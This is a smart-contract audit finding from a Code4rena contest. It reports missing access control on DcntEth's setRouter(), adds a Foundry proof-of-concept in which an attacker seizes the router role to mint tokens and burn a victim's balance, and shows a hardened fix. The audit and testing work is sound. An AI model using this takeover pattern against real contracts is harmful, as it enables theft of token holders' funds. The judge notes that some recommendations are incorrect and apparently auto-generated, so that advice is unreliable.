Platform: Code4rena
Start Date: 19/01/2024
Pot Size: $36,500 USDC
Total HM: 9
Participants: 113
Period: 3 days
Judge: 0xsomeone
Id: 322
League: ETH
Rank: 102/113
Findings: 1
Award: $0.09
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: NPCsCorp
Also found by: 0x11singh99, 0xAadi, 0xBugSlayer, 0xE1, 0xPluto, 0xSimeon, 0xSmartContract, 0xabhay, 0xdice91, 0xprinc, Aamir, Aymen0909, CDSecurity, DadeKuma, DarkTower, EV_om, Eeyore, GeekyLumberjack, GhK3Ndf, Giorgio, Greed, Inference, JanuaryPersimmon2024, Kaysoft, Krace, Matue, MrPotatoMagic, NentoR, Nikki, PUSH0, Soliditors, Tendency, Tigerfrake, Timeless, Timenov, ZanyBonzy, ZdravkoHr, abiih, adeolu, al88nsk, azanux, bareli, boredpukar, cu5t0mpeo, d4r3d3v1l, darksnow, deth, dutra, ether_sky, haxatron, ke1caM, kodyvim, m4ttm, mgf15, mrudenko, nmirchev8, nobody2018, nuthan2x, peanuts, piyushshukla, ravikiranweb3, rouhsamad, seraviz, simplor, slylandro_star, stealth, th13vn, vnavascues, wangxx2026, zaevlad
0.0879 USDC - $0.09
https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L20-L22
https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L24-L26
https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L28-L30
The DcntEth contract extends the OFTV2 contract and overrides its minting and burning functions to include an additional access check. The contract also includes a setRouter() function to set the router address, which is the address required to call the mint() and burn() functions.
The router property is a public address variable. This address is used to control who can mint and burn tokens. The onlyRouter modifier restricts certain functions (mint and burn) so that they can be called only by the router address. The setRouter() function allows the router address to be updated. The mint() and burn() functions are used to increase and decrease the supply of tokens; because of the onlyRouter modifier, they can only be called by the router address.
However, the DcntEth contract lacks sufficient access control on setRouter(), which can lead to several potential attack vectors. Here are some detailed explanations:
The setRouter() function allows any address to update the router address.
https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L20
function setRouter(address _router) public {
An attacker could call this function and set the router to their own address. Once they have done this, they can mint and burn tokens freely, manipulating the token supply. They could also burn tokens from other holders, causing them to lose value.
The router address has significant power in the contract because it can mint and burn tokens.
https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L24-L26
function mint(address _to, uint256 _amount) public onlyRouter {
https://github.com/decentxyz/decent-bridge/blob/main/src%2FDcntEth.sol#L28-L30
function burn(address _from, uint256 _amount) public onlyRouter {
If this address is compromised, an attacker could gain control over the token supply.
The setRouter() function also doesn't check whether the new router is valid.
function setRouter(address _router) public { router = _router; }
This could lead to unexpected behavior if the new router is not capable of handling the minting and burning operations.
Manual review, VS Code
To secure this contract against these attacks, you should implement additional access controls on setRouter() (for example, restricting it to the contract owner), decentralize the decision-making process behind router changes, and add checks in the setRouter() function so that an invalid router address is rejected.
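To make the takeover concrete, the following Foundry test is an added example written for this page; it is not code from the Decent repository. VulnerableToken reproduces the pattern quoted above (an open setRouter() in front of router-gated mint() and burn()) in a minimal ERC20-style contract, and HardenedToken shows one owner-gated setter with a zero-address check. The contract and function names, the deployer-as-owner mechanism, the "not owner" / "zero router" revert strings and the use of forge-std are all assumptions of the example, not details of the audited project.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example (not the project's code): assumes a Foundry project with forge-std installed.
import "forge-std/Test.sol";

// Minimal stand-in for the vulnerable pattern: router-gated mint/burn behind an open setter.
contract VulnerableToken {
    address public router;
    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;

    modifier onlyRouter() {
        require(msg.sender == router, "not router");
        _;
    }

    // The bug under discussion: no access control, so any caller can make itself the router.
    function setRouter(address _router) public {
        router = _router;
    }

    function mint(address _to, uint256 _amount) public onlyRouter {
        totalSupply += _amount;
        balanceOf[_to] += _amount;
    }

    function burn(address _from, uint256 _amount) public onlyRouter {
        balanceOf[_from] -= _amount; // checked arithmetic reverts on underflow
        totalSupply -= _amount;
    }
}

// Same token, with the setter restricted to a deployer-set owner and a zero-address check.
contract HardenedToken {
    address public immutable owner;
    address public router;
    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;

    constructor() {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    modifier onlyRouter() {
        require(msg.sender == router, "not router");
        _;
    }

    function setRouter(address _router) external onlyOwner {
        require(_router != address(0), "zero router");
        router = _router;
    }

    function mint(address _to, uint256 _amount) external onlyRouter {
        totalSupply += _amount;
        balanceOf[_to] += _amount;
    }

    function burn(address _from, uint256 _amount) external onlyRouter {
        balanceOf[_from] -= _amount;
        totalSupply -= _amount;
    }
}

contract RouterTakeoverTest is Test {
    address internal attacker = makeAddr("attacker");
    address internal victim = makeAddr("victim");

    // An arbitrary account hijacks the router role, inflates supply and burns a holder's balance.
    function test_anyoneCanHijackRouter() public {
        VulnerableToken token = new VulnerableToken();
        token.setRouter(address(this)); // deployer acting as the legitimate router
        token.mint(victim, 100 ether);

        vm.startPrank(attacker);
        token.setRouter(attacker);
        token.mint(attacker, 1_000_000 ether);
        token.burn(victim, 100 ether);
        vm.stopPrank();

        assertEq(token.balanceOf(victim), 0);
        assertEq(token.balanceOf(attacker), 1_000_000 ether);
        assertEq(token.totalSupply(), 1_000_000 ether);
    }

    // With the owner check in place the same call reverts, the zero address is rejected,
    // and the owner path still works for the legitimate router.
    function test_hardenedSetterRejectsNonOwnerAndZero() public {
        HardenedToken token = new HardenedToken();

        vm.prank(attacker);
        vm.expectRevert("not owner");
        token.setRouter(attacker);

        vm.expectRevert("zero router");
        token.setRouter(address(0));

        token.setRouter(address(this));
        token.mint(victim, 1 ether);
        assertEq(token.balanceOf(victim), 1 ether);
    }
}
```

Run with `forge test --match-contract RouterTakeoverTest`. The first test passes against the vulnerable contract precisely because the setter is open; the second shows that a single ownership check on setRouter() closes the takeover path while leaving the router-gated mint()/burn() behaviour unchanged.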
Access Control
#0 - c4-pre-sort
2024-01-23T23:16:45Z
raymondfam marked the issue as sufficient quality report
#1 - c4-pre-sort
2024-01-23T23:16:52Z
raymondfam marked the issue as duplicate of #14
#2 - alex-ppg
2024-02-03T13:30:20Z
The overall submission contains some incorrect recommendations and its contents appear to be automatically generated.
#3 - c4-judge
2024-02-03T13:30:24Z
alex-ppg marked the issue as partial-75